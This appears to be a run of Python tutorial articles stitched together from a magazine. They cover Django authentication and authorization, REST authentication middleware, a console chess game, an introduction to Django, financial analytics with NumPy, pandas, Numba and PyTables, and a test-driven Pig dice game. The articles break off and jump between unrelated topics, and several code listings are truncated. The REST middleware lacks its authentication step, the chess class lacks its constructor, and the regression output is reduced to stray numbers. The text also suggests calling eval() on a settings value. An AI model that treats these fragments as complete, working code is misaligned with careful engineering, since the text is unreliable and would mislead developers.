state-of-the-art hash of the password. Not encryption. I'll repeat that for folks who still think encrypted
passwords are a good idea:
Always use a hash of a password. Never use encryption.
Best security practice is never to store a password that can be easily recovered. A hash can be undone only
with great effort, but encryption means all passwords are exposed once the encryption key is available. The
Django auth module includes methods that properly hash raw passwords, in case you have the urge to
implement your own login page:
https://docs.djangoproject.com/en/dev/ref/contrib/auth/#django.contrib.auth.models.User.set_password.
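A minimal sketch of that API in use (the username is, of course, illustrative):

from django.contrib.auth.models import User

user = User.objects.create(username="alice")
user.set_password("s3cret")   # stores a salted hash, never the raw password
user.save()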
Better Authentication
Better than Django's internal authentication is something like ForgeRock OpenAM. This takes identity
management out of Django entirely: http://forgerock.com/what-we-offer/open-identity-stack/openam/.
While this adds components to the architecture, it's also a blessed simplification. All of the username and
password folderol is delegated to the OpenAM server.
Any time a page is visited without a valid OpenAM token, the response from a Django app must be a simple
redirect to the OpenAM login server. Even the user stories are simplified by assuming a valid, active user.
The bottom line is this: authentication is a solved problem. This is something we shouldn't reinvent. Not
only is it solved, but it's easy to get wrong when trying to reinvent it.
Best practice is to download or purchase an established product for identity management and use it for all
authentication.
Authorization
The Authorization problem is more nuanced, and more interesting, than Authentication. Once we know who
the user is, we still have to determine what they're allowed to do. This varies a lot. A small change to the
organization, or a business process, or available data can have a ripple effect through the authorization rules.
We have to emphasize these two points:
Security includes Authorization.
Authorization pervades every feature.
In the case of Django, there are multiple layers of authorization testing. We have settings, we have checks
in each view function and we have middleware classes to perform server-wide checks. All of this is important
and we'll look at each piece in some detail.
When we define our data model with Django, each model class has an implicit set of three permissions
(can_add, can_delete and can_change). We can add to this basic list if we have requirements that aren't based
on simple Add, Change, Delete (or CRUD) processing, as the sketch below shows.
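A sketch of adding a custom, non-CRUD permission to a model; the Invoice model and permission name are hypothetical:

from django.db import models

class Invoice(models.Model):
    amount = models.DecimalField(max_digits=10, decimal_places=2)

    class Meta:
        # declared in addition to the implicit add/change/delete permissions
        permissions = (("can_approve", "Can approve invoices"),)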
For Django 1.5 and newer, get_profile() isn't used; instead a customized User model is used:
https://docs.djangoproject.com/en/1.5/topics/auth/customizing/#extending-user.
The second way to enforce the feature mapping is to enable or disable the entire application in the
customer's settings file. This is a simple administrative step: to enable an application, restart the customer's
mod_wsgi instance, and let them use their shiny, new web site.
And yes, this is a form of security. It's not directly related to passwords. It's related to features, functions,
what data users can see and what data users can modify.
More Complexity
Sadly, some of the features our sales folks identified are only a small part of a Django application. In one
case, a feature cut across several applications. Drat. We have several choices to implement these features.
Option 1 is to use template changes to conceal or reveal the feature. This is the closest fit with the way
Django works. The data is available; it's just not shown unless the customer's settings provide the proper
set of templates on the template search path.
This can also be enforced in the code, by making the template name dependent on the customer
settings. Building the template name in code has the advantage of slightly simpler unit testing, since no
settings change is required for the various test cases.
name = settings.FEATURE_W_APP1_TEMPLATE_NAME
render_to_response("app1/{0}.html".format(name),
                   data,
                   context_instance=RequestContext(request))
Option 2 is to isolate a simple feature into a single class and write two subclasses of the feature: an active,
enabled implementation and a disabled implementation. We can then configure the enabled or disabled
subclass in the customer's settings.
This is the most Pythonic, since it's a very common OO programming practice. Picking a class to instantiate
at run time is simply this:
feature_class = eval(settings.FEATURE_X_CLASS_NAME)
feature_x = feature_class()
This is the easiest to test, also, since it's simple object-oriented programming. For those who don't like
eval(), a more explicit mapping can be used:
feature_class = {
    "enabled": EnabledFeature, "disabled": DisabledFeature,
}[settings.FEATURE_X_CLASS_NAME]
feature_x = feature_class()
The App2_View subclass of feature_z_super.App2_View is a concrete implementation of the abstract class. All of
the features are handled properly.
The idea is that our customer's settings will include the concrete app module. The concrete app module
will depend on the abstract super app code, plus the specific extensions to either enable the feature or work
around the missing feature. When we need to make common changes, we can change the abstract super
app and know that the changes will correctly propagate to the concrete implementations.
In both cases, it's very Django to have the application configured dynamically in the settings file.
RESTful Services
RESTful web services are slightly different from the default Django requests. REST requests expect XML
or JSON replies instead of HTML replies. There will be more verbs than GET or POST requests. Additionally,
RESTful web services don't rely on cookies to maintain state. Otherwise, REST requests are processed very
much like other Django requests.
One school of thought is to provide the RESTful API as a separate server. The Django front-end makes
RESTful requests to a Django back-end. This architecture makes it possible to build Adobe Flex or
JavaScript front-end presentations that work with the same underlying data as the HTML presentation.
Another school of thought is to provide the RESTful API in parallel with the Django HTML interface. Since
the RESTful view functions and the HTML view functions are part of the same application module, it's easy
to use unit testing to assure that both HTML and REST interfaces provide the same results.
In either case, we need authentication on the RESTful API. This authentication doesn't involve a redirect to
a login page, or the use of cookies. Each request must provide the required information. HTTP provides two
standard forms of authentication: BASIC and DIGEST.
While we can move beyond the standard, it doesn't seem necessary.
The idea behind DIGEST authentication is to provide hashed username and password credentials on an
otherwise unsecured connection. DIGEST requires a dialog so the server can provide a nonce which
is hashed in with the username and password. If the client's hash agrees with the server's expectation, the
credentials are good. The back-and-forth aspect of this makes it unpleasantly slow.
It's easy to use a Django middleware class to strip out the HTTP Authorization header, parse the username
and password from the credentials and perform a Django logon to update the request.
Here's a sample middleware class (assuming Python 2.7.5). This example handles all requests prior to URL
parsing; it's suitable for a purely RESTful server. In the case of mixed REST and HTML, process_view
should be used instead of process_request, and only RESTful views should be authenticated this way. HTML
view functions should be left alone for Django's own authentication middleware (Listing 2). If you're using
Django 1.5 and Python 3.2, the base 64 decode is slightly different:
base64.b64decode(auth).decode("ASCII")
The ASCII decode is essential because the decoded auth header will be bytes, not a proper Unicode string.
Note that a password is not stored anywhere. We rely on Django's password management via a hash and
password matching. We also rely on SSL to keep the credentials secret.
Listing 2. Requests prior to URL parsing
from django.http import HttpResponse

class REST_Authentication(object):
    def process_request(self, request):
        if not request.is_secure():
            return HttpResponse("Not Secure", status=500)
        if request.method not in ("GET", "POST", "PUT", "DELETE"):
            return HttpResponse("Not Supported", status=500)
In the case that you're using an OpenAM identity management server, this changes very slightly.
What changes is the implementation of the authenticate() method. You'll provide your own authentication
backend which passes the credentials to the OpenAM server for authentication:
https://docs.djangoproject.com/en/1.5/topics/auth/customizing/#writing-an-authentication-backend.
Summary
What we've seen are some of the squares used in playing Buzzword Bingo. We've looked at Defense
in Depth: having multiple checks to assure that only the right features are available to the right people.
Perhaps the most important thing is this:
Object Modeling
Quite briefly, Chess requires a board consisting of 8x8 squares, 16 White pieces and 16 Black pieces. Each
player is assigned a color, quite similarly to a general leading an army. The piece types are (in parentheses,
the number of items in each set):
Modeling Pieces
Pieces require the following properties to describe their behavior:
Ability for diagonal, straight or L-shaped movement on the board. L-shaped (or Gamma-shaped, from the
Greek letter Γ) movement is performed only by Knights.
Ability to pass over other pieces in their movement path. Actually, only Knights are allowed to do this.
Limitation on the number of squares that can be traversed in each move. Pawns and Kings can move one
square, Knights make standard L-shaped moves and the rest of the pieces can move freely as long as
their path is unobstructed.
The color of the piece (Black or White).
The type, which can be any of Rook, Knight, Pawn, King, Queen, Bishop.
This is all the information we need to construct an instance of a chess piece. Basically the type of the
piece determines the rest of the properties, except for the color of course, which is explicitly set according
to which piece set the piece belongs to (Listing 1).
Listing 1. Piece Class
class Piece(object):
    DirectionDiagonal = False
    DirectionStraight = False
    DirectionGamma = False
    LeapOverPiece = False
    MaxSquares = 0
    Color = None
    Type = None
    AvailableTypes = ["Rook", "Knight", "Pawn", "King", "Queen", "Bishop"]
    Types_Direction_Map = {
        "Rook":   ["straight"],
        "Knight": ["gamma"],
        "Pawn":   ["straight"],
        "King":   ["straight", "diagonal"],
        "Queen":  ["straight", "diagonal"],
        "Bishop": ["diagonal"],
    }
    Types_MaxSquares_Map = {
        "Rook":   0,
        "Pawn":   1,
        "King":   1,
        "Queen":  0,
        "Bishop": 0,
        "Knight": -1,
    }
As we can see, the constructor (the __init__ method) receives the Type and Color parameters through the
**kwargs keyword argument list (you can read more on keyword and non-keyword variable-length
argument lists in this blog article: http://www.saltycrane.com/blog/2008/01/how-to-use-args-and-kwargs-in-python/).
The Game class contains actions that refer to the gameplay. Properties include the players,
a variable that holds a Board instance and a dictionary named Timers for storing timer info for each user.
Instantiating a Game object randomly assigns colors to users (with the randint function) and also instantiates
and sets up a board for our game. The timer display requires a helper function, the time_format method,
which displays the time elapsed for the current user in human readable format (MM:SS).
The way the timer works is pretty straightforward; entering the while-loop and checking if the second has
changed (https://github.com/georgepsarakis/python-chess-board/blob/master/chessboard.py#L312), it prints
the time elapsed from the start of the game for the user. Now the user needs a way of stopping the timer.
To prompt the user for input but with a timeout, we use the select function of the Python built-in select
module (you can read more on this module in the manual: http://docs.python.org/2/library/select.html).
We set the timeout to one second; any input is made available in the r variable. Just by hitting Enter
(https://github.com/georgepsarakis/python-chess-board/blob/master/chessboard.py#L334) the timer stops
and the current time is stored in the Timers dictionary under the key of the current user.
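A sketch of that select-based one-second prompt (POSIX only, since select on file objects is not supported on Windows):

import sys
import select

# wait up to one second for the user to press Enter
r, w, x = select.select([sys.stdin], [], [], 1.0)
if r:
    sys.stdin.readline()  # consume the Enter keypress and stop the timer here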
The largest portion of the game logic resides in the move_piece method. This method begins by requesting user
input; a move in our convention requires specifying the source square holding the piece in chess notation and
the target square where it should move. These two positions are separated by a dash and a greater-than sign
(loosely resembling an arrow). For example, B2->B3 will move the white pawn from B2 to B3.
If a user enters the string "quit" the game terminates.
In order to perform the move, a number of checks must be made, and the move is either approved or rejected.
In the first case, the game modifies the board accordingly and starts the timer for the other player, waiting for
the next move. The following checks are performed (a sketch of the movement classification follows this list):
Whether the source square is actually occupied and, if occupied, whether the piece belongs to the user.
Whether the move is in a straight line, a diagonal line or an L-shaped (gamma-shaped) pattern. These checks
require calculation of the absolute distance between the starting and target rows and columns (https://github.
com/georgepsarakis/python-chess-board/blob/master/chessboard.py#L373 and https://github.com/
georgepsarakis/python-chess-board/blob/master/chessboard.py#L374). Straight-line movement is easily
detected if the starting and target columns are the same or the starting and target rows are equal; in the first
case the piece moves in a vertical line on the board, otherwise in a horizontal one. The condition for diagonal
moves is that the absolute column and row distances must be equal. Finally, L-shaped moves (valid only for
Knights) are detected if either the row or column distance is equal to 2 and the other coordinate difference is
equal to 1. So if we have a row distance of 2, then the column distance must be 1.
Checking if the piece's path is blocked by other pieces. This check is performed only if the
LeapOverPiece property of the moving piece is False. We must first construct the list of squares that
must be crossed by the piece in order to accomplish the move; thus we distinguish our cases according
to the type of movement, whether it is happening on a straight line (https://github.com/georgepsarakis/
python-chess-board/blob/master/chessboard.py#L402) or a diagonal (https://github.com/georgepsarakis/
python-chess-board/blob/master/chessboard.py#L418). L-shaped moves are performed by Knights, which
incidentally can leap over pieces as well.
Having the path that outlines the move, we can then implement the check on the permitted number of
squares for this piece (https://github.com/georgepsarakis/python-chess-board/blob/master/chessboard.
py#L424).
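As referenced above, a sketch of the movement-classification logic, with positions as (row, column) tuples; this is a reconstruction, not the article's exact code:

def classify_move(src, dst):
    row_dist = abs(dst[0] - src[0])
    col_dist = abs(dst[1] - src[1])
    if row_dist == col_dist == 0:
        return None                     # no move at all
    if row_dist == 0 or col_dist == 0:
        return "straight"               # same row or same column
    if row_dist == col_dist:
        return "diagonal"               # equal absolute distances
    if sorted((row_dist, col_dist)) == [1, 2]:
        return "gamma"                  # L-shaped, Knights only
    return None                         # no legal movement pattern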
Figure 1. The board with all the pieces in its initial state
Summary
In this tutorial we have gone through the Python code that builds a simplistic version of a chess game
between two human players. We explored some aspects of object modeling and gained some experience
in creating and interacting with Python objects. Dealing with user text input, displaying the board on the
console and displaying the timer were some of the interface difficulties, while outlining the game process,
setting up the board with the pieces and validating user moves were amongst the algorithmic challenges we
faced here. Of course, this is not a complete game implementation but rather a working example; it would
definitely require much more error handling and validation, as well as incorporating all the chess rules.
Some thoughts on expanding the code:
Adding a --timer parameter and restricting the user's game time to this number of seconds.
Keeping a history of the moves and displaying lost pieces for each user.
Adding check and checkmate detection.
A "play against the computer" feature (!): unfortunately, building a chess engine is very difficult.
What's a Framework?
A framework is a set of tools and libraries that facilitates the development of a certain type of
application. Web frameworks facilitate the development of web applications by allowing languages
like Python or Ruby to take advantage of standard methods to complete tasks like interacting with
HTTP payloads, or tracking users throughout a site, or constructing basic HTML pages. Leveraging this
scaffolding, a developer can focus on creating a web application instead of doing a deep dive on HTTP
internals and other lower-level technologies.
While the dominant web framework for the Ruby language is Rails, Python has many different web
frameworks, including Bottle, web.py, and Flask, with the vast majority of Python web applications right now
being developed using the mature framework Django. Django is a full-stack web framework which
includes an Object Relational Mapper (so you can use Python syntax to access values in a relational
database), a template renderer (so you can insert variables into an HTML page that will then be populated
before the page is sent to the browser), and various additional utilities like date parsers, form handlers, and
cache helpers.
Learning Django via the official tutorial can be one of the easiest ways to get started with Python, and really
isn't much harder than learning the language alone. I advise this approach to all people new to Python and
think it's the best way to get going.
Getting Started
Before starting this tutorial, you should try to have a current version of either Mac OS X or Ubuntu Linux.
These are the easiest operating systems on which to develop for the web and the most well supported in terms
of documentation and setup guides. If you get lost, you'll be much happier on one of these two platforms.
If you're a fan of another Linux distribution, you shouldn't have too many problems. If you want to use
Windows though, while doable, this is certainly not advised. Not all Python libraries are easily installed on
Windows, and since most Python developers use OS X or Linux, you'll run into fewer surprises as you go
along. If you have Windows and don't want to dual-boot your machine, get VirtualBox (https://www.virtualbox.
org/) and install Ubuntu 13.04 inside a virtual machine. The software is free and widely used, and running
Ubuntu inside of Windows is one of the most common scenarios for VirtualBox.
And Django?
Once Python and pip are installed, you can look at the Python Package Index for all the different packages
available to install. Installing Django from here is as easy as typing pip install Django into the terminal.
More information can be found in the docs (https://docs.djangoproject.com/en/1.5/topics/install/), but
installing via pip should work just fine.
Final Thoughts
The above information is not meant to be all-encompassing, but hopefully provides some basic information
and background on getting started with Python and the Django Tutorial. Often the best resource for getting
further into online tutorials is experimenting with project-related tasks and peer advice for when you get
stuck. Having an easily accessed community of support at your fingertips is also one of the best things about
Python by far, and you should feel free to post comments and questions to... at...
Lastly, for any new or longtime Python enthusiasts, I'm happy to respond to emails, IMs and coffees if you
ever make it to Nairobi.
Hopefully you now have a background on how to get started with Python via the Django tutorial. So, get to
it and write in with any questions you have so we can help you out.
The data and financial analytics environment has changed dramatically over the last years and it is still
changing at a fast pace. Among the major trends to be observed are:
big data: be it in terms of volume, complexity or velocity, available data is growing drastically; new
technologies, an increasingly connected world, more sophisticated data gathering techniques and devices
as well as new cultural attitudes towards social media are among the drivers of this trend
real-time economy: today, decisions have to be made in real-time, business strategies are much shorter
lived and the need to cope faster with the ever increasing amount and complexity of decision-relevant data
steadily increases
Decision makers and analysts faced with such an environment can no longer rely on traditional
approaches to process data or to make decisions. In the past, these areas were characterized by highly
structured processes which were repeated regularly or when needed.
For example, on the data processing side, it was and still is quite common to transfer operational data
into separate data warehouses for analytics purposes by executing weekly or monthly batch processes.
Similarly, with regard to decision making, time-consuming yearly strategy and budgeting processes still
seem common practice among the majority of larger companies.
While these approaches might still be valid for certain industries, big data and the real-time economy
demand much more agile and interactive data analytics and decision making. One extreme example
illustrating this is high-frequency trading of financial securities, where data has to be analyzed on a massive
scale and decisions sometimes have to be made in milliseconds. This is only possible by making use of
high performance technology and by applying automated, algorithmic decision processes. While this might
seem extreme for most other business areas, the need for more interactive analytics and faster decisions has
become a quite common phenomenon.
S_t = S_(t-dt) * exp((r - sigma**2 / 2) * dt + sigma * sqrt(dt) * z)
where z is a standard normally distributed random variable and 0 < t <= T, with T the final time horizon
(for details, refer to the book Hilpisch, Yves (2013): Derivatives Analytics with Python. Visixion GmbH,
http://www.visixion.com).
To get mathematically reliable results, a high number I of simulated stock price paths in combination with a
fine enough time grid is generally needed. This makes the Monte Carlo simulation approach rather compute
intensive. For one million stock price paths with 50 time intervals each, this leads to 50 million single
computations, each involving exponentiation, square roots and the draw of a (pseudo-)random number. The
following is a pure Python implementation of the respective simulation algorithm, making heavy use of
lists and for-loops (Listing 1).
Listing 1. Monte Carlo Simulation: Pure Python Code
#
# Simulating Geometric Brownian Motion with Python
#
from time import time
from math import exp, sqrt, log
from random import gauss

t0 = time()

# Parameters
S0 = 100; r = 0.05; sigma = 0.2
T = 1.0; M = 50; dt = T / M; I = 1000000

# Simulating I paths with M time steps
S = []
for i in range(I):
    path = []
    for t in range(M + 1):
        if t == 0:
            path.append(S0)
        else:
            z = gauss(0.0, 1.0)
            St = path[t - 1] * exp((r - 0.5 * sigma ** 2) * dt
                                   + sigma * sqrt(dt) * z)
            path.append(St)
    S.append(path)

# Calculating the absolute log return
av = sum([path[-1] for path in S]) / I
print "Absolute Log Return %7.3f" % log(av / S0)
print "Duration in Seconds %7.3f" % (time() - t0)
The absolute log return over one year comes out correctly at 5%, so the discretization obviously works well.
The execution takes almost 2 minutes in this case.
Although the Monte Carlo simulation is quite easily implemented in pure Python, NumPy is designed to
handle exactly such operations. To this end, note that our end product S is a list of one million lists with
51 entries each. This can be seen as a matrix or a rectangular array of size 1,000,000 x 51. And NumPy's
major strength is to process data structures of this kind.
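A minimal sketch of the vectorized NumPy approach, reusing the parameters from Listing 1 (the article also presents its own NumPy version and a still more compact log-Euler variant, which may differ):

import numpy as np

S = np.zeros((M + 1, I))
S[0] = S0
for t in range(1, M + 1):
    z = np.random.standard_normal(I)   # one draw per path and time step
    S[t] = S[t - 1] * np.exp((r - 0.5 * sigma ** 2) * dt
                             + sigma * np.sqrt(dt) * z)
print "Absolute Log Return %7.3f" % np.log(S[-1].mean() / S0)

The output reported for the NumPy version: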
Absolute Log Return   0.050
Duration in Seconds   5.046
That more compact variant has almost identical execution speed to the NumPy version. As a matter of
software design and also taste, it could even be a little bit too concise when it comes to readability and
maintenance.
No matter which approach is used, matplotlib helps with convenient visualization of the simulation
results. The following code plots the first 10 simulated paths from the NumPy array S and also the average
over time across all one million paths (Listing 4).
Listing 4. Monte Carlo Simulation: Code to Generate Plot
#
# Plotting 10 Stock Price Paths + Average
#
import matplotlib.pyplot as plt
plt.plot(S[:, :10])
plt.plot(np.sum(S, axis=1) / I, "r", lw=2.0)
plt.grid(True)
plt.title("Stock Price Paths")
plt.show()
The result from this code is shown in Figure 1 with the thicker red line being the average over all paths.
Figure 1. 10 simulated stock price paths and the average over all paths (red line)
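With the pandas version current in 2013, the data retrieval can be done with DataReader, which pulls daily quotes from Yahoo! Finance; a sketch:

import numpy as np
import pandas as pd
from pandas.io.data import DataReader

# about five years of daily data for Google and Apple
GOOG = DataReader("GOOG", "yahoo", start="2008-07-28")
AAPL = DataReader("AAPL", "yahoo", start="2008-07-28")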
The analysis was implemented on 3 August 2013 and the starting date is chosen to get about five years
of stock price data. GOOG and AAPL are now pandas DataFrame objects that contain a time index and a
number of different time series. Let's have a look at the five most recent records of the Google data:
In:
GOOG.tail()
Out:
Date          Open     High     Low      Close    Volume    Adj Close
2013-07-29    884.90   894.82   880.89   882.27   1891900   882.27
2013-07-30    885.46   895.61   880.87   890.92   1755600   890.92
2013-07-31    892.99   896.51   886.18   887.75   2072900   887.75
2013-08-01    895.00   904.55   895.00   904.22   2124500   904.22
2013-08-02    903.44   907.00   900.82   906.57   1713900   906.57
We are only interested in the Close data of both stocks, so we generate a third DataFrame, using the
respective columns of the other DataFrame objects. We can do this by calling the DataFrame function
and providing a dictionary specifying what we want from the other two objects. Both time series are
normalized to start at 100, while the time index is automatically inferred from the input.
In:
DATA = pd.DataFrame({"AAPL": AAPL["Close"] / AAPL["Close"].ix[0],
                     "GOOG": GOOG["Close"] / GOOG["Close"].ix[0]}) * 100
DATA.head()
Out:
Date          AAPL          GOOG
2008-07-28    100.000000    100.000000
2008-07-29    101.735751    101.255449
2008-07-30    103.549223    101.169517
2008-07-31    102.946891     99.293679
2008-08-01    101.463731     98.059188
Calling the plot method of the DataFrame class generates a plot of the time series data.
In:
DATA.plot()
Figure 2. Apple and Google stock prices from 28 July 2008 until 2 August 2013; both
time series normalized to start at 100
It is a stylized fact that prices of technology stocks are highly positively correlated. This means, roughly
speaking, that they tend to perform in tandem: when the price of one stock rises (falls), the other stock price
is likely to rise (fall) as well. To analyze whether this is the case with Apple and Google stocks, we first add
log return columns to our DataFrame.
In:
DATA["AR"] = np.log(DATA["AAPL"] / DATA["AAPL"].shift(1))
DATA["GR"] = np.log(DATA["GOOG"] / DATA["GOOG"].shift(1))
DATA.tail()
Out:
Date          AAPL          GOOG          AR          GR
2013-07-29    290.019430    184.915744    0.015302   -0.003485
2013-07-30    293.601036    186.728706    0.012274    0.009757
2013-07-31    293.089378    186.064302   -0.001744   -0.003564
2013-08-01    295.777202    189.516264    0.009129    0.018383
2013-08-02    299.572539    190.008803    0.012750    0.002596
Next we want to implement an ordinary least squares (OLS) regression analysis (Listing 5).
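With the pandas of the time, the regression itself can be as short as this sketch (regressing Apple returns on Google returns):

In:
model = pd.ols(y=DATA["AR"], x=DATA["GR"])
model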
105
0.3578
0.3573
Rmse:
0.0179
1263
2
702.6634, p-value:
0.0000
Listing 6. Scatter plot of the returns and the resulting linear regression line
In:
import matplotlib.pyplot as plt
plt.plot(DATA["GR"], DATA["AR"], "b.")
x = np.linspace(plt.axis()[0], plt.axis()[1] + 0.01)
plt.plot(x, model.beta[1] + model.beta[0] * x, "r", lw=2)
plt.grid(True); plt.axis("tight")
plt.xlabel("Google Stock Returns"); plt.ylabel("Apple Stock Returns")
Obviously, there is indeed a high positive correlation of +0.67 between the two stock prices. This is readily
illustrated by a scatter plot of the returns and the resulting linear regression line (Listing 6). Figure 3 shows
the resulting output of this code. All in all, we need about 10 lines of code to retrieve five years of stock
price data for two stocks, to plot this data, to calculate and add the daily log returns for both stocks and to
conduct a least squares regression. Some additional lines of code yield a custom scatter plot of the return
data plus the linear regression line. This illustrates that Python in combination with pandas is highly efficient
when it comes to interactive financial analytics. In addition, through the high-level programming model,
the technical skills an analyst needs are reduced to a minimum. As a rule of thumb, one can say that every
analytical question and/or analytics step can be translated into one or two lines of Python/pandas code.
Figure 3. Scatter plot of Google and Apple stock price returns from 28 July 2008 until
2 August 2013; the red line is the OLS regression result with y = 0.005 + 0.67 x
Just-in-Time Compiling
A number of typical analytics algorithms demand a large number of iterations over data sets, which then
results in (nested) loop structures. The Monte Carlo algorithm is an example of this. In that case, using
NumPy and avoiding loops on the Python level yields a significant increase in execution speed. NumPy
is really strong when it comes to fully populated matrices/arrays of rectangular form. However, not all
algorithms can be beneficially cast into such a structural set-up.
We illustrate the use of the just-in-time compiler Numba (http://numba.pydata.org) to speed up pure Python
code through an interactive IPython session.
The following is an example function with a nested loop structure where the inner loop increases in
multiplicative fashion with the outer loop.
In:
import math
def f(n):
    iter = 0.0
    for i in range(n):
        for j in range(n * i):
            iter += math.sin(math.pi / 2)
    return int(iter)
It returns the number of iterations, with the counting being made a bit more compute intensive than usual.
Let's measure the execution speed of this function by using the IPython magic function %time.
In:
n = 400
%time f(n)
32 million loops take about 75 seconds to execute. Let's see what we can get from just-in-time compiling
with Numba.
In:
import numba as nb
f_nb = nb.autojit(f)
Two lines of code suffice to compile the pure Python function into a Python-callable compiled C function.
In:
n = 400
%time f_nb(n)
Out:
CPU times: user 41 ms, sys: 0 ns, total: 41 ms
Wall time: 40.2 ms
31920000L
This time, the same number of loops only takes 40 milliseconds to execute. A speed-up of almost 1,900
times. The remarkable aspects are that this speed-up is reached by two additional lines of code only and that
no changes to the Python function are necessary.
Although this algorithm could in principle be implemented using standard NumPy arrays, the array would
have to be of shape 16,000 x 16,000, or approximately 2 GB in size. In addition, due to the very nature of
the nested loop, there would not be much potential to vectorize it. Moreover, operating with higher n might
lead to too high a memory demand.
In:
n = 1500
%time f_nb(n)
Out:
CPU times: user 2.13 s, sys: 0 ns, total: 2.13 s
Wall time: 2.13 s
1686375000L
For n = 1,500 the algorithm loops more than 1.6 billion times with the last inner loop looping 1,499 x 1,499
= 2,247,001 times. With this parametrization, the typical NumPy approach is not applicable anymore.
However, the Numba compiled function does the job in a little bit more than 2 seconds.
In summary, we can say the following:
code: two lines of code suffice to generate a compiled version of a loop-heavy pure Python algorithm
speed: execution speed of the Numba-compiled function is about 1,900 times faster than pure Python
memory: Numba preserves the memory efficiency of the algorithm since it only needs to store a single floating
point number and not a large array of floats
Out-of-Memory Operations
Just-in-time compiling obviously helps to implement custom algorithms that are fast and memory efficient.
However, there are in general data sets that exceed available memory, like large arrays which might grow over
time, and on which one has to implement numerical operations resulting in output that again might exceed
available memory.
The library PyTables, which is based on the HDF5 standard (http://www.hdfgroup.org/HDF5/), offers a number
of routes to implement out-of-memory calculations.
Suppose you have a computing node with 512 MB of RAM, as with a free account on Wakari. Assume
further that you have an array called ear which is 700 MB in size or larger. On this array, you might want to
calculate the Python expression
3 * sin(ear) + abs(ear) ** 0.5
Using pure NumPy would lead to four temporary arrays of the size of ear and an additional result array of
the same size. This is all but memory efficient. The library numexpr (https://code.google.com/p/numexpr/)
resolves this problem by optimizing, parallelizing and compiling numerical expressions like these and
avoiding temporary arrays, leading to significant speed-ups in general and much better use of memory.
However, in this case it does not solve the problem, since even the input array does not fit into the memory.
PyTables offers a solution through the Expr module, which is similar in spirit to numexpr but works with
disk-based arrays. Let's have a look at a respective IPython session:
In:
import numpy as np
import tables as tb
h5 = tb.openFile('data.h5', 'w')
This opens a PyTables/HDF5 database where we can store our example data.
In:
n = 600
ear = h5.createEArray(h5.root, 'ear', atom=tb.Float64Atom(), shape=(0, n))
This creates a disk-based array with name ear that is expandable in the first dimension and has a fixed width of
600 in the second dimension.
In:
rand = np.random.standard_normal((n, n))
for i in range(250):
    ear.append(rand)
ear.flush()
This populates the disk-based array with (pseudo-)random numbers. We append in a loop to generate an
array that is larger than the available memory.
In:
ear
Out:
/ear (EArray(150000, 600))
atom := Float64Atom(shape=(), dflt=0.0)
maindim := 0
flavor := numpy
byteorder := little
chunkshape := (13, 600)
The array has a size of more than 700 MB. We need a disk-based results store for our numerical calculation,
since the result does not fit into the 512 MB of memory either.
In:
out = h5.createEArray(h5.root, 'out', atom=tb.Float64Atom(), shape=(0, n))
Now, we can use the Expr module to evaluate the numerical expression from above: Listing 7.
Listing 7. Using the Expr module to evaluate the numerical expression
In:
expr = tb.Expr('3 * sin(ear) + abs(ear) ** 0.5')
expr.setOutput(out, append_mode=True)
%time expr.eval()
Out:
CPU times: user 2.29 s, sys: 1.51 s, total: 3.8 s
Wall time: 34.6 s
/out (EArray(150000, 600))
atom := Float64Atom(shape=(), dflt=0.0)
maindim := 0
flavor := numpy
byteorder := little
chunkshape := (13, 600)
This code evaluates the expression and writes the result to the out array on disk. Doing all
the calculations plus writing 700+ MB of output takes about 35 seconds in this case. This might not seem very
fast, but it makes possible a calculation that was impossible on the given hardware before.
Finally, you should close your database.
In:
h5.close()
The example illustrates that PyTables allows the implementation of an array operation that would involve at
least 1.4 GB of RAM using NumPy and numexpr, on a machine with only 512 MB of RAM.
Now, the whole data set is in the memory and can be processed there.
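A page is missing from this excerpt at this point; presumably the disk-based array was first read into a NumPy array named arr, on a machine with sufficient RAM, along the lines of:

In:
arr = ear.read()   # load the entire EArray into memory as a NumPy ndarray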
In:
import numexpr as ne
%time res = ne.evaluate('3 * sin(arr) + abs(arr) ** 0.5')
Out:
CPU times: user 6.37 s, sys: 264 ms, total: 6.64 s
Wall time: 881 ms
game.py
test_game.py
Both files are currently empty. To get started, let's add an empty test case to test_game.py to prepare for our
game of Pig: Listing 1.
Listing 1. An empty TestCase subclass
from unittest import TestCase

class GameTest(TestCase):
    pass
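The test method itself (Listing 2) is not reproduced in this excerpt; based on the refactored version shown later in Listing 31, it presumably reads (added inside GameTest, replacing pass):

def test_join(self):
    """Players may join a game of Pig"""
    pig = game.Pig('PlayerA', 'PlayerB', 'PlayerC')
    self.assertEqual(pig.get_players(), ('PlayerA', 'PlayerB', 'PlayerC'))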
We simply instantiate a new Pig game with some player names. Next, we check to see if we're able to get an
expected value out of the game. As mentioned earlier, we can describe our expectations using assertions: we
assert that certain conditions are met. In this case, we're asserting equality with TestCase.assertEqual. We
want the players who start a game of Pig to equal the same players returned by Pig.get_players. The TDD
steps suggest that we should now run our test suite and see what happens.
To do that, run the following command from your project directory:
python -m unittest
It should detect that the test_game.py file has a unittest.TestCase subclass in it and automatically run any
tests within the file. Your output should be similar to this: Listing 3.
Listing 3. Running our first test
E
======================================================================
ERROR: test_join (test_game.GameTest)
Players may join a game of Pig
----------------------------------------------------------------------
Traceback (most recent call last):
  File "./test_game.py", line 11, in test_join
    pig = game.Pig('PlayerA', 'PlayerB', 'PlayerC')
AttributeError: 'module' object has no attribute 'Pig'

----------------------------------------------------------------------
Ran 1 test in 0.000s

FAILED (errors=1)
We had an error! The E on the first line of output indicates that a test method had some sort of Python error.
This is obviously a failed test, but there's a little more to it than just our assertion failing. Looking at the
output a bit more closely, you'll notice that it's telling us that our game module has no attribute Pig. This
means that our game.py file doesn't have the class that we tried to instantiate for the game of Pig.
Much better. Now we see F on the first line of output, which is what we want at this point. This indicates that
we have a failing test method, or that one of the assertions within the test method did not pass. Inspecting the
additional output, we see that we have an AssertionError. The return value of our Pig.get_players method is
currently None, but we expect the return value to be a tuple with player names. Now, following the TDD
process, we need to satisfy this test. No more, no less (Listing 6). And we need to verify that we've satisfied
the test: Listing 7.
Listing 6. Implementing code to satisfy the test

class Pig:
    def __init__(self, *players):
        self.players = players

    def get_players(self):
        """Returns a tuple of all players"""
        return self.players
Excellent! The dot (.) on the first line of output indicates that our test method passed. The return value of
Pig.get_players is exactly what we want it to be. We now have a high level of confidence that players may
join a game of Pig, and we will quickly know if that stops working at some point in the future. There's
nothing more to do with this particular part of the game right now. We've satisfied our basic requirement.
Let's move on to another part of the game.
Since we're relying on random numbers, we test the result of the roll method repeatedly. Our assertions
all happen within the loop because it's important that we always get an integer value from a roll and that the
value is within our range of one to six. It's not bulletproof, but it should give us a fair level of confidence
anyway. Don't forget to stub out the new Pig.roll method so our test fails instead of errors out (Listing 9 and
Listing 10).
